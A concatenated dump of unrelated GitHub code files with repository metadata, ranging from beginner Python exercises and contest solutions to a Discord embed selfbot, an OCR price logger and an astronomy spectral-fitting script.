glTranslatef(Pos[0],Pos[1],Pos[2])\n glMultMatrixf(Euler.T)\n glScalef(Scale[0],Scale[1],Scale[2])\n\n if Name == \"Ground\":\n glColor3f(0.1,0.1,0.0)\n self.Box(1.0)\n\n else :\n glColor3f(0.0,0.5,0.2)\n self.Sphere(1.0)\n glPopMatrix()\n glFlush()\n","repo_name":"Winteradio/JJOL_JAK","sub_path":"Drawing.py","file_name":"Drawing.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43978725022","text":"#Step 1. Welcome the user\r\nprint('welcome to the multiplication table')\r\n#2)Step 2. Print out instructions\r\nprint('please enter the number you want to view its multiplication table')\r\n#3)Step 3. Ask the user to enter a value\r\nvalue= int(input('please enter a number:'))\r\n#4)Step 4. Print out the multiplication table\r\nfor i in range(1,13,1):\r\n print(value, '*', i, '=', value * i)\r\n#5)Step 5. Stop\r\nprint('stop')\r\n\r\nupper_limit= int(input('please input an upper limit:'))\r\nnumber_list = []\r\nprime_number_list = []\r\nupper_limit = upper_limit +1\r\nfor i in range(2, upper_limit, 1):\r\n number_list.append(i)\r\n print(len(number_list))\r\n\r\nprime_number= 2\r\n\r\nwhile(len(number_list)>0):\r\n for i in number_list:\r\n if(i % prime_number == 0):\r\n number_list.remove(i)\r\n print(len(number_list))\r\n prime_number_list.append(prime_number)\r\n prime_number = number_list.pop(0)\r\nprime_number_list.append(prime_number)\r\nprint(prime_number_list)\r\n\r\n \r\n","repo_name":"abdullateef28/c_l_project_shoyinka_lateef","sub_path":"codemultable.py","file_name":"codemultable.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34586487862","text":"#- Készítsen magyarországi mobilszám ellenőrző fv-t:\n#\t- Lehetséges mobil formátumok: \"06 20 123-45 67\", \"+36 301234567\", van más ??\n#\t- \"körzetszámok\": 20 30 70 50 31 ?\n\n\ndef mobilszamellenorzes(szam: str):\n szam = szam.replace(' ','')\n szam = szam.replace(' -','')\n if szam[0]=='+':\n szam = szam.replace('+ ','00')\n if szam[0:4] =='0036':\n szam=szam.replace('0036', '06')\n if szam[0:2] != '06':\n return False\n if szam[2:4] != '20'and szam[2:4] !='30' and szam[2:4] !='70' and szam[2:4] !='50':\n return False\n if len(szam) !=11:\n return False\n return True\n\n\nszam= input('Adja meg a telefonszámot:')\nif mobilszamellenorzes(szam) == True:\n print('A mobiltelefon szám helyes')\nelse:\n print('A mobiltelefon szám helyes ')","repo_name":"fabrykevin/agazati","sub_path":"agazatialapvizsgagyujt/python + web kész feladatok + leírás (saját)/Python/20230215/mobil.py","file_name":"mobil.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16804024904","text":"import os, sys\nimport numpy as np \n\ndef parse_args_from_config(config_path):\n\n import importlib.util\n \n spec = importlib.util.spec_from_file_location(\"get_hpyerparameters\", config_path )\n\n modulevar = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(modulevar)\n\n return modulevar\n\n\ndef tensor_rgb2bgr(image):\n permute = [2, 1, 0]\n return image[:, permute]\n\n\ndef print_dataset_dist(sample_dict, prefix):\n WARNING = '\\033[93m'\n ENDC = '\\033[0m'\n\n num_total_samples = 0\n\n for k, v in sample_dict.items():\n num_total_samples += v\n \n class_indices = list(sample_dict.keys())\n class_indices.sort()\n\n thres = 100 / len(sample_dict.keys())\n\n print('='*5, prefix, str(num_total_samples), '='*5)\n\n for class_idx in class_indices:\n k = class_idx\n v = sample_dict[class_idx]\n ratio = (v/num_total_samples) * 100\n message = '{} : {} ({:.4f}%)'.format(k, v, ratio)\n\n if ratio < thres:\n color = WARNING\n else:\n color = ENDC\n\n print ('{}{}{}'.format(color, message, ENDC))\n print ('') \n\ndef tensor2numpy(tensor_image):\n return tensor_image.cpu().numpy().astype(np.float32).transpose(1,2,0)","repo_name":"jeonggyu-kang/age_prediction","sub_path":"utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14268360968","text":"import discord, random\nfrom discord.ext import commands\nimport os\nimport getpass\nos.system('cls')\nprint(r'''\n .-._ _,-,\n `._`-._ _,-'_,'\n `._ `-._ _,-' _,'\n `._ `-._ __.-----.__ _,-' _,'\n `._ `#===\"\"\" \"\"\"===#' _,'\n `._/) ._ _. (\\_,'\n )*' **.__ __.** '*( \n # .==..__ \"\" \"\" __..==, # \nxo#1010 # `\"._(_). .(_)_.\"' # EV1L IN5IDE\nogu: nemo discord: xo#1010\nig: w3ax github: scxr''')\nTOKEN = getpass.getpass('Enter your token here : ')\nprefix = '!'\nbot = commands.Bot(command_prefix=prefix, self_bot=True)\n\n\n@bot.event\nasync def on_ready():\n print(\"Bot presence t u r n e d on ( ͡° ͜ʖ ͡°)\")\n\n\n@bot.command()\nasync def embed(ctx, *, message):\n message_arr = message.split('\\n')\n if len(message_arr) < 2:\n print('''[ERROR] Your message format should be the following:\\n\n !embed\n title here (required)\n description here (required)\n embed_thumbnail (optional)''')\n return\n title = message_arr[0]\n thumbnail_url = None\n description = message_arr[1]\n\n if len(message_arr) == 3:\n thumbnail_url = message_arr[2]\n\n embed = discord.Embed(title=title, description=description, colour=random.randint(0, 0xFFFFFF))\n if thumbnail_url != None:\n embed.set_thumbnail(url=thumbnail_url)\n await ctx.send(embed=embed)\n await ctx.message.delete()\n\n\n\nbot.run(TOKEN, bot=False)","repo_name":"scxr/selfbots","sub_path":"message_embedder.py","file_name":"message_embedder.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1857386914","text":"#doesn't work\nfile = open(\"taming.in\", \"r\")\noutput = open(\"taming.out\", \"w\")\nn=int(file.readline())\nbreakdays=file.readline()\nfile.close()\nbreakdays = list(breakdays.split(\" \"))\nif int(breakdays[0]) > 0:\n output.write('-1')\n\nbreakdays[0]='0'\nt=-1\nreq=0\npos=0\nj=n\nfor i in range(0,n):\n\n j-=1\n #if t != -1 and breakdays[j] != -1 and breakdays[j] #!= t:\n #output.write('-1')\n if(t == -1):\n\t t = int(breakdays[j])\n\t\n if(int(breakdays[j]) == -1):\n\t breakdays[i] = t\n\t\n if(int(breakdays[j]) == 0):\n\t req+=1\n\t\n if(int(breakdays[j]) == -1):\n\t pos+=1\n\t\n if(t > -1):\n\t t-=1\nans=str(req)+' '+str(req+pos)\n\noutput.write(ans)\noutput.close()\n","repo_name":"funnoodle11/USACO","sub_path":"2018FebBronze/taming.py","file_name":"taming.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42828037166","text":"#https://www.w3resource.com/python-exercises/python-basic-exercises.php\r\n#22. Write a Python program to count the number 4 in a given list.\r\n\r\nlist = [1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5]\r\ncount = 0\r\n\r\nfor x in list:\r\n\tif x == 4:\r\n\t\tcount = count + 1\r\n\t\t\r\nprint(\"Found \" + str(count) + \" instances of 4.\")","repo_name":"benryan03/Python-Practice","sub_path":"basic-part1-exercise022-count.py","file_name":"basic-part1-exercise022-count.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9913942442","text":"from marshmallow import Schema, fields\nfrom marshmallow import ValidationError\n\nimport typing as t\nimport json\n\n\nclass InvalidInputErrot(Exception):\n \"\"\"Invalid model input.\"\"\"\n\n\n# List of column names to change before validation\nSYNTAX_ERROR_FIELD_MAP = {}\n\n\nclass TitanicDataRequestSchema(Schema):\n pclass = fields.Integer()\n sex = fields.Str()\n age = fields.Float(allow_none=True)\n sibsp = fields.Integer(allow_none=True)\n parch = fields.Integer(allow_none=True)\n fare = fields.Float(allow_none=True)\n cabin = fields.Str(allow_none=True)\n embarked = fields.Str(allow_none=True)\n title = fields.Str(allow_none=True)\n\n\ndef _filter_error_rows(errors: dict,\n validated_input: t.List[dict]) -> t.List[dict]:\n \"\"\"Remove input data rows with errors.\"\"\"\n\n indexes = errors.keys()\n # Delete them in reverse order to don't\n # throw off the subsequent indexes\n for index in sorted(indexes, reverse=True):\n del validated_input[index]\n\n return validated_input\n\n\ndef validate_inputs(input_data):\n \"\"\"Check prediction inputs against schema.\"\"\"\n\n # set many=True to allow passing in a list\n schema = TitanicDataRequestSchema(strict=True, many=True)\n\n # Convert syntax error field names (beginning with numbers)\n for dict in input_data:\n for key, value in SYNTAX_ERROR_FIELD_MAP.items():\n dict[value] = dict[key]\n del dict[key]\n\n errors = None\n try:\n schema.load(json.loads(input_data))\n except ValidationError as exc:\n errors = exc.messages\n print(f\"ERROR MSG: {exc.messages}\")\n print(f\"ERROR DATA: {exc.data}\")\n print(f\"ERROR FIELDS: {exc.fields}\")\n\n # convert syntax error field names back\n # NOTE: Never name your data fields with\n # numbers as the first letter\n for dict in input_data:\n for key, value in SYNTAX_ERROR_FIELD_MAP.items():\n dict[key] = dict[value]\n del dict[value]\n\n if errors:\n validated_input = _filter_error_rows(\n errors=errors, validated_input=input_data\n )\n else:\n validated_input = input_data\n\n return validated_input, errors\n","repo_name":"JCupe17/deploying-ml-test","sub_path":"packages/ml_api/api/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2848635925","text":"#!/usr/bin/python\n\nimport sys\nimport superclass\n\nclass PrettyPrint( superclass.MetaPrettyPrinter ):\n\n NAME = 'swapon-pp'\n DESCRIPTION=\"\"\"Show swap areas in canonical style.\"\"\"\n\n def __init__( self ):\n super( PrettyPrint, self ).__init__()\n return\n\n def pre_begin_file( self, name = None ):\n self.titles = []\n self.areas = dict()\n self.widths = dict()\n return\n\n def next_line( self, line ):\n tokens = line.split()\n L = len( tokens )\n if L > 0:\n if not self.titles:\n self.titles = tokens\n self.widths = map(\n len,\n self.titles\n )\n elif L == len(self.titles):\n mountpoint = tokens[0]\n self.areas[ mountpoint ] = tokens\n self.widths = map(\n lambda i : max(\n self.widths[i],\n len( tokens[i] )\n ),\n range( L )\n )\n return\n\n def report( self, final = False ):\n if final:\n pass\n elif len( self.areas ) > 0:\n N = len( self.widths )\n fmts = map(\n '{{0:<{0}}}'.format( self.widths[ i ] ),\n range( N )\n )\n titles = map(\n fmts[i].format( self.titles[i] ),\n range( N )\n )\n self.println()\n self.println( ' '.join( titles ) )\n for mountpoint in sorted(\n self.areas,\n # Sort by name within priority\n key = lambda f : '{0:d} {1}'.format( f[4], f[0] )\n ):\n tokens = self.areas[ mountpoint ]\n columns = map(\n fmts[i].format( tokens[i] ),\n range( len( tokens ) )\n )\n self.println( ' '.join( columns ) )\n pass\n return\n","repo_name":"megacoder/generic-prettyprinter","sub_path":"genpp/swapon-plugin.py","file_name":"swapon-plugin.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72981572305","text":"from common import raw\n\nimport collections\n\n\nages = collections.deque([0] * 9)\n\nfor age in raw.split(','):\n ages[int(age)] += 1\n\nfor i in range(80):\n ages.rotate(-1) # that's a rotate!\n ages[6] += ages[8]\n\nprint('Part 1:', sum(ages))\n\nfor i in range(256 - 80):\n ages.rotate(-1)\n ages[6] += ages[8]\n\nprint('Part 2:', sum(ages))\n","repo_name":"avayert/aoc2021","sub_path":"src/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18139392015","text":"import os \nimport time\n\nfrom numpy import record\n\nimport gui_related\nfrom num_to_record import Recorder\nfrom screen_capture import Screen_Capture\nimport utilities\nfrom visual_processing import Visual_Process\nfrom config_reader import Config_Reader\nfrom gui_related import GUI_functions\nimport pyautogui\n\nclass Execute:\n def __init__(self):\n \"\"\"\n process to create required folders.\n call utilities for that.\n \"\"\"\n utils = utilities.Utilities()\n self.config = Config_Reader().get_config()\n utils.create_folder(\"captured_pics\")\n utils.create_folder(\"pic_to_extract\")\n utils.create_folder(\"buy_sell_particles\")\n self.csv_path = self.config[\"path\"][\"csv_path\"]\n\n def main(self):\n recorder = Recorder()\n screen_capture = Screen_Capture()\n picture_save_path = self.config[\"path\"][\"captured_pics\"]\n path_data_picture = os.path.join(\"pic_to_extract\",\"data.png\")\n screen_capture.capture(picture_save_path)\n GUI_func = GUI_functions()\n sell_image_path = os.path.join(\"buy_sell_particles\",\"sell.png\")\n buy_image_path = os.path.join(\"buy_sell_particles\",\"buy.png\")\n coordinates_sell = GUI_func.get_coordinates(sell_image_path)\n coordinates_buy = GUI_func.get_coordinates(buy_image_path)\n cropped_buy = screen_capture.crop_captured(coordinates_buy)\n cropped_sell = screen_capture.crop_captured(coordinates_sell)\n visual_process = Visual_Process()\n screen_capture.save_image(cropped_sell,path_data_picture)\n result1 = visual_process.read_pic_from_path(path_data_picture) \n price = visual_process.easyocr_result_interpreter(result1)\n print(price)\n #visual_process.easyocr_result_interpreter(result2)\n recorder.record(price,self.csv_path)\n\n\n def test_main(self):\n test_image_path_sell = os.path.join(\"test_pics\",\"sell.png\")\n test_image_path_buy = os.path.join(\"test_pics\",\"buy.png\")\n utils = utilities.Utilities()\n utils.create_folder(\"captured_pics\")\n config = Config_Reader().get_config()\n sell_image_path = os.path.join(\"buy_sell_particles\",\"sell.png\")\n buy_image_path = os.path.join(\"buy_sell_particles\",\"buy.png\")\n picture_save_path = config[\"path\"][\"captured_pics\"]\n print(picture_save_path)\n print(type(picture_save_path))\n Screen_Capture().capture(picture_save_path)\n GUI_func = GUI_functions()\n coordinates_sell = GUI_func.get_coordinates(sell_image_path)\n coordinates_buy = GUI_func.get_coordinates(buy_image_path)\n print(coordinates_buy)\n print(coordinates_buy[0],coordinates_buy[1],\"coords xy\")\n print(coordinates_sell)\n print(type(coordinates_buy))\n visual_process = Visual_Process()\n result1 = visual_process.read_pic(test_image_path_buy)\n result2 = visual_process.read_pic(test_image_path_sell)\n visual_process.easyocr_result_interpreter(result1)\n visual_process.easyocr_result_interpreter(result2)\n cropped_buy = Screen_Capture().crop_captured(coordinates_buy)\n cropped_sell = Screen_Capture().crop_captured(coordinates_sell)\n\n \"\"\"\n GUI_func.click_pic(sell_image_path)\n time.sleep(3)\n GUI_func.click_pic(buy_image_path)\n \"\"\"\n\n\nif __name__ == \"__main__\":\n executer = Execute()\n while True:\n executer.main()\n time.sleep(60)","repo_name":"LulutasoAI/financial_data_gathering","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37528737230","text":"import cv2\r\ndef split_frames(filename, output_str):\r\n capture = cv2.VideoCapture(filename)\r\n i = 0\r\n while(capture.isOpened()):\r\n ret, frame = capture.read() \r\n if ret == False:\r\n break\r\n if i == 20:\r\n break \r\n cv2.imwrite(output_str.format(i),frame)\r\n i += 1\r\n capture.release()\r\nsplit_frames('xilogravura.mp4', 'frame-{}.jpg')\r\nsrc = cv2.imread('frame-{}.jpg', cv2.IMREAD_UNCHANGED)\r\n#percent by which the image is resized\r\nscale_percent = 50\r\n#calculate the 50 percent of original dimensions\r\nwidth = int(src.shape[1] * scale_percent / 100)\r\nheight = int(src.shape[0] * scale_percent / 100)\r\n# dsize\r\ndsize = (width, height)\r\n# resize image\r\noutput = cv2.resize(src, dsize)\r\ncv2.imwrite('D:/cv2-resize-image-50.png',output) \r\ncv2.imwrite('c:/ArteMaisComp/novo_frame={}.jpg',output) \r\ncv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n","repo_name":"KinsleyDavis/ArtMaisComp","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37086377493","text":"import re\nfrom datetime import datetime\n\n# Чтение исходного файла\nwith open('dates.txt', 'r') as file:\n text = file.read()\n\n# Поиск дат в формате ДД.ММ.ГГГГ �� ДД/ММ/ГГГГ\npattern1 = r'\\b\\d{2}\\.\\d{2}\\.\\d{4}\\b'\npattern2 = r'\\b\\d{2}/\\d{2}/\\d{4}\\b'\ndates1 = re.findall(pattern1, text)\ndates2 = re.findall(pattern2, text)\n\n# Подсчет количества дат в каждом формате\ncount1 = len(dates1)\ncount2 = len(dates2)\n\n# Найти даты февраля в формате ДД/ММ/ГГГГ\nfebruary_dates = []\nfor date in dates2:\n try:\n parsed_date = datetime.strptime(date, '%d/%m/%Y')\n if parsed_date.month == 2:\n february_dates.append(date)\n except ValueError:\n pass\n\n# Запись дат февраля в формате ДД/ММ/ГГГГ в новый файл\nwith open('february_dates.txt', 'w') as file:\n file.write('\\n'.join(february_dates))\n\n# Вывод результатов\nprint(f\"Количество дат в формате ДД.ММ.ГГГГ: {count1}\")\nprint(f\"Количество дат в формате ДД/ММ/ГГГГ: {count2}\")\nprint(\"Даты февраля в формате ДД/ММ/ГГГГ сохранены в файл 'february_dates.txt'.\")\n","repo_name":"Caucasus1/Proi_1sem_Sungurov","sub_path":"pz_14/pz_14.py","file_name":"pz_14.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42130560517","text":"#import python libraries\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport astropy.io.fits as fits\nimport astropy.wcs as wcs\nimport os \nimport time\n#from astropy.nddata import Cutout2D\nfrom scipy import ndimage\nimport astropy.constants as K\nimport astropy.units as u\nfrom astropy.cosmology import Planck15 as p15\nimport scipy.ndimage\nfrom lmfit import minimize, Parameters, report_fit\nfrom heapq import nlargest\nimport concurrent.futures\n\n\npath = os.path.dirname(os.path.abspath('__file__'))\n\n\nfilefits_data = 'NGC6810_crop.fits'\nfilefits_antenna = 'NGC6810_antenna.fits'\ndatacube = fits.open(path+'/file/'+filefits_data)[0]\ndatacube_antenna = fits.open(path+'/file/'+filefits_antenna)[0]\ndatacube.data = np.squeeze(datacube.data)\ndatacube_antenna.data = np.squeeze(datacube_antenna.data)\nNz,Ny,Nx = datacube.shape\nprint (Nz, Ny, Nx)\n\n\n#define the z-axis which corresponds to frequency\nnaxis3 = datacube.header['NAXIS3']\ncrpix3 = datacube.header['CRPIX3']\ncrval3 = datacube.header['CRVAL3']\ncdelt3 = datacube.header['CDELT3']\n\nkk = 1+np.arange(naxis3)\n \nfrequency = crval3+cdelt3*(kk-crpix3) #Hz\nfrequency /= 1e9 #GHz\n\nprint(frequency[:10])\n\n\n#define the z-axis in velocity units \n#average frequency\nfrequency_mean = np.mean(frequency)*u.GHz\nprint(frequency_mean)\n\n\n\n\n#z = v/c = (nu_emit - nu_obs)/nu_obs \nvelocity_unit = ((frequency_mean- (frequency*u.GHz))/(frequency*u.GHz))*K.c.to('km/s')\nprint(velocity_unit[:10])\nvelocity = velocity_unit.value\nprint(velocity[:10])\ndv = velocity[0]-velocity[1]\n\n#location of the target\nx0,y0 = 250, 250\n#size of the square aperture \ndl = 100\n#extract the spectrum\n#total spectrum\nspectrum = np.nansum(datacube.data[:,y0-dl:y0+dl,x0-dl:x0+dl],axis = (1,2))\n#1plot: frequency - spectrum\n\n\n\n\n\n## RMS DETERMINATION WITH THE POWER RESPONSE \n\n#data/power response\nnoise_cube = datacube.data / datacube_antenna.data\n\n#Choosing an empty region\nx0, y0 = 294, 143\ndl = 20\nnoise = noise_cube[:,y0-dl:y0+dl,x0-dl:x0+dl]\nerror = np.std(noise[1:,:,:])\n\nprint(\"rms = {:2f} mJy\".format(error))\nprint(\"####################\")\n\n\n\n\n\n\n\n## Multi-gaussians model\ndef residual(pars, x, p, data=None, sigma=None):\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n\n\n if p == 1:\n model = pars['amp_g1'] * np.exp(-argu1) \n if p == 2:\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2'] * np.exp(-argu2))\n if p == 3:\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3'] * np.exp(-argu3))\n if p == 4:\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n argu4 = (x - pars['cen_g4'])**2 / (2*(pars['wid_g4'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3']*np.exp(-argu3) + pars['amp_g4']*np.exp(-argu4))\n if p == 5:\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n argu4 = (x - pars['cen_g4'])**2 / (2*(pars['wid_g4'])**2)\n argu5 = (x - pars['cen_g5'])**2 / (2*(pars['wid_g5'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3']*np.exp(-argu3) + pars['amp_g4']*np.exp(-argu4) + pars['amp_g5']*np.exp(-argu5))\n \n if data is None:\n return model\n if sigma is None:\n return model - data\n return (model - data) / sigma\n\nx = velocity\ndata = spectrum\n\n \n\n##Making the Spiral grid for fitting\ndef invers_spiral(A):\n return A[::-1] #inverting the array, so it starts from the center \n\ndef spiral_mat_to_vect(A):\n v = []\n while(A.size != 0):\n v.append(A[0,:])\n A = A[1:,:].T[::-1]\n return np.concatenate(v)\n\ndef spiral_vect_to_mat(v):\n L = int(np.sqrt(v.size)) # lunghezza del pezzo da aggiungere\n l = L\n A = np.zeros((L,L))\n i = 3 # parto da 3 per fare in modo che la coordinata x aumenti al secondo step\n x = 0 # coordinata x del nuovo pezzo\n y = 0 # coordinata y del nuovo pezzo\n \n A[x,y:l] = v[0:l]\n A = A.T[::-1]\n v = v[l:len(v)]\n\n while(v.size != 0):\n i += 1 # Ad ogni step ruoto e riempio la prima riga della matrice\n if i % 2 == 0: # Ogni due rotazioni si accorcia la lunghezza l\n l -= 1\n if (i + 1) % 4 == 0: # Ogni 4 rotazioni x aumenta\n x += 1\n if i % 4 == 0: # Ogni 4 rotazioni y aumenta con un ritardo di 1 step rispetto a x\n y += 1\n A[x,y:y+l] = v[0:l]\n A = A.T[::-1]\n v = v[l:len(v)]\n \n for rotations in range(i % 4): # Faccio le rotazioni che mancano per rimettere la matrice nel verso giusto\n A = A.T[::-1]\n \n return A\n\n \n#Generating moments map\n\n# datacube.data = np.where(datacube.data<0, 0*datacube.data, datacube.data)\nmask_cube = np.where(datacube.data > 3*error, datacube.data, np.nan)\nM0 = np.nansum(datacube.data, axis = (0))*dv\n\nM1 = np.nansum(datacube.data[:,:,:]*velocity[:,np.newaxis,np.newaxis], axis=0)*dv / M0\nthr = 3*error\nM0[np.where(M0 3*error): #fitspiral1\n if flux_map_tmp[jj,ii]>5*error:\n spec_tmp = datacube.data[:,jj,ii]\n spec_tmp = np.nan_to_num(spec_tmp)\n spec_tmp[0]=0\n \n ##FIT CON 1 GAUSSIANA\n if jj > 1.14777 * ii + 20: #the pixel above the galaxy diagonal\n velmax = 50 #limit to select the blueshifted pixel\n velmin = -300\n else:\n velmax = 300\n velmin=-50\n \n fit_params1gx.add('cen_g1', value=M1[jj,ii], min = velmin, max= velmax)\n fit_params1gx.add('wid_g1', value=M2[jj,ii], min = 10, max = 300)\n fit_params2gx.add('cen_g1', value=M1[jj,ii], min = velmin, max= velmax)\n \n\n tmp_res1 = executor.submit(compute1, residual, fit_params1g, x, 1, spec_tmp, error)\n tmp_res2 = executor.submit(compute2, residual, fit_params2g, x, 2, spec_tmp, error)\n tmp_res1x = executor.submit(compute1x, residual, fit_params1gx, x, 1, spec_tmp, error)\n tmp_res2x = executor.submit(compute2x, residual, fit_params2gx, x, 2, spec_tmp, error)\n out_1g, fit1, bic_1g = tmp_res1.result()\n out_2g, fit2, bic_2g = tmp_res2.result()\n out_1gx, fit1x, bic_1gx = tmp_res1x.result()\n out_2gx, fit2x, bic_2gx = tmp_res2x.result()\n \"\"\"\n out1, fit1 = compute(residual, fit_params1g, x, 1, spec_tmp, error)\n out2, fit2 = compute(residual, fit_params2g, x, 2, spec_tmp, error)\n out1x, fit1x = compute(residual, fit_params1gx, x, 1, spec_tmp, error)\n out2x, fit2x = compute(residual, fit_params2gx, x, 2, spec_tmp, error)\n \"\"\"\n \n mod1[:,jj,ii] = fit1\n fit_params1g.add('amp_g1', value=out_1g[0], min = 0.0025, max= 0.1)\n fit_params1g.add('cen_g1', value=out_1g[1], min = velmin, max= velmax)\n fit_params1g.add('wid_g1', value=out_1g[2], min = 10, max = 300)\n\n mod2[:,jj,ii] = fit2\n \n fit_params2g.add('amp_g1', value=out_2g[0], min = 0.0025, max= 0.1)\n fit_params2g.add('cen_g1', value=out_2g[1], min = velmin, max= velmax)\n fit_params2g.add('wid_g1', value=out_2g[2], min = 10, max = 200)\n fit_params2g.add('amp_g2' , value=out_2g[3], min= 0.0025, max= 0.1)\n fit_params2g.add(name=('cen_g2'), expr='peak_split+cen_g1')\n fit_params2g.add('wid_g2', value=out_2g[5], min =10, max= 200)\n\n \n ##FIT CON 1 GAUSSIANA con velocità iniziale data dal momento 1\n \n mod1x[:,jj,ii] = fit1x\n fit_params1gx.add('amp_g1', value=out_1gx[0], min = 0.0025, max= 0.1)\n\n \n ##FIT CON 2 GAUSSIANE con velocità iniziale data dal momento1\n mod2x[:,jj,ii] = fit2x\n \n fit_params2gx.add('amp_g1', value=out_2gx[0], min = 0.0025, max= 0.1)\n fit_params2gx.add('wid_g1', value=out_2gx[2], min = 10, max = 200)\n fit_params2gx.add('amp_g2' , value=out_2gx[3], min= 0.0025, max= 0.1)\n fit_params2gx.add(name=('cen_g2'), expr='peak_split+cen_g1')\n fit_params2gx.add('wid_g2', value=out_2gx[5], min =10, max= 200)\n \n if jj in range1 and ii in range2:\n # if bic_1g < bic_2g and bic_1g < bic_3g and bic_2g - bic_1g > 2.3 and bic_3g - bic_1g > 2.3:\n bic_min = np.min([bic_1g, bic_2g, bic_1gx, bic_2gx])\n if bic_1g == bic_min: \n flux_map[jj,ii] = np.nansum(fit1) * dv\n vel_map[jj,ii] = np.nansum((fit1*velocity)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = np.nansum((fit1*(velocity-vel_map[jj,ii])**2)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = vdisp_map[jj,ii]**0.5\n mod[:,jj,ii] = mod1[:,jj,ii]\n elif bic_2g == bic_min: \n flux_map[jj,ii] = np.nansum(fit2) * dv\n vel_map[jj,ii] = np.nansum((fit2*velocity)) * dv/flux_map[jj,ii]\n vdisp_map[jj,ii] = np.nansum((fit2*(velocity-vel_map[jj,ii])**2)) * dv /flux_map[jj,ii] \n vdisp_map[jj,ii] = vdisp_map[jj,ii]**0.5\n mod[:,jj,ii] = mod2[:,jj,ii]\n elif bic_1gx == bic_min:\n flux_map[jj,ii] = np.nansum(fit1x) * dv \n vel_map[jj,ii] = np.nansum((fit1x*velocity)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = np.nansum((fit1x*(velocity-vel_map[jj,ii])**2)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = vdisp_map[jj,ii]**0.5\n mod[:,jj,ii] = mod1x[:,jj,ii]\n elif bic_2gx == bic_min:\n flux_map[jj,ii] = np.nansum(fit2x) * dv \n vel_map[jj,ii] = np.nansum((fit2x*velocity)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = np.nansum((fit2x*(velocity-vel_map[jj,ii])**2)) * dv / flux_map[jj,ii]\n vdisp_map[jj,ii] = vdisp_map[jj,ii]**0.5\n mod[:,jj,ii] = mod2x[:,jj,ii]\n# flux_map[flux_map_tmp<5*error] = np.nan\n# vel_map[flux_map_tmp < 5*error] = np.nan\n# vdisp_map[flux_map_tmp < 5*error] = np.nan \n \nplt.figure(figsize = (12,4))\n\nplt.subplot(131)\nplt.imshow(flux_map, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 0.7)\nplt.subplot(132)\nplt.imshow(vel_map, origin = 'lower', vmin = -300, vmax = 300, cmap ='jet')\nplt.colorbar(shrink = 0.7)\nplt.subplot(133)\nplt.imshow(vdisp_map, origin = 'lower', vmin = 0, vmax =200, cmap = 'jet')\nplt.colorbar(shrink = 0.7)\n\nflux = flux_map\nfor jj in range (Ny):\n for ii in range(Nx):\n if jj < 1.22 * ii - 300:\n flux[jj,ii] = np.nan\n\nvel = vel_map\nfor jj in range (Ny):\n for ii in range(Nx):\n if jj < 1.22 * ii - 300:\n vel[jj,ii] = np.nan\n \ndisp = vdisp_map\nfor jj in range (Ny):\n for ii in range(Nx):\n if jj < 1.22 * ii - 300:\n disp[jj,ii] = np.nan\n\nplt.figure(figsize = (12,4))\n\nplt.subplot(131)\nplt.imshow(flux, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 